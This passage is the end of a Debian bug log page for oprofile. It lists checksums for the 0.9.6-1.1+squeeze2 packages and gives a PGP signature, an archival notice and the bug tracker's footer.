 a044f85e6085f65db5a25ae72556de8bdbef50c2 3160576 oprofile_0.9.6-1.1+squeeze2_amd64.deb
 64e96f97102f4c027c5cff0a1af3d00aa8fdaf62 97616 oprofile-gui_0.9.6-1.1+squeeze2_amd64.deb
Checksums-Sha256: 
 bcac41dc93092e30343957df8d1b11cd5b2bbfa201ce1e24dc6137bd7aae23a7 1469 oprofile_0.9.6-1.1+squeeze2.dsc
 0f2355e29fdee4e1f577e1cc583899af7cfe6e13aca289a2140ad7ab76ffbcaa 16764 oprofile_0.9.6-1.1+squeeze2.diff.gz
 46b8546e78526b6179e8e3b36aad17214b2130deb9a9aa43c4882ad297ca44b4 3160576 oprofile_0.9.6-1.1+squeeze2_amd64.deb
 00af773de9472382f6f3bfa1f7ea818c14ce33be909b58adf939f8ae26961519 97616 oprofile-gui_0.9.6-1.1+squeeze2_amd64.deb
Files: 
 6831afc80189751b177120394645d7c2 1469 devel optional oprofile_0.9.6-1.1+squeeze2.dsc
 0c8be36980dfd79aa8c429f9b9fc7d1b 16764 devel optional oprofile_0.9.6-1.1+squeeze2.diff.gz
 92c95695cc792cd7430a70ffea2c9413 3160576 devel optional oprofile_0.9.6-1.1+squeeze2_amd64.deb
 03a761416ed1d4f0fc9e5a42f4e66230 97616 devel optional oprofile-gui_0.9.6-1.1+squeeze2_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk4bFCwACgkQQWTRs4lLtHltxACgwXRVSkDtpnO+5Fzo7LVsqux5
b08AnicJ4GQ1niiFkTJSAUxE3hpevlIR
=Pjyc
-----END PGP SIGNATURE-----





Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Thu, 29 Dec 2011 07:32:41 GMT) Full text and rfc822 format available.

Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Thu Apr 17 01:52:09 2014; Machine Name: beach.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.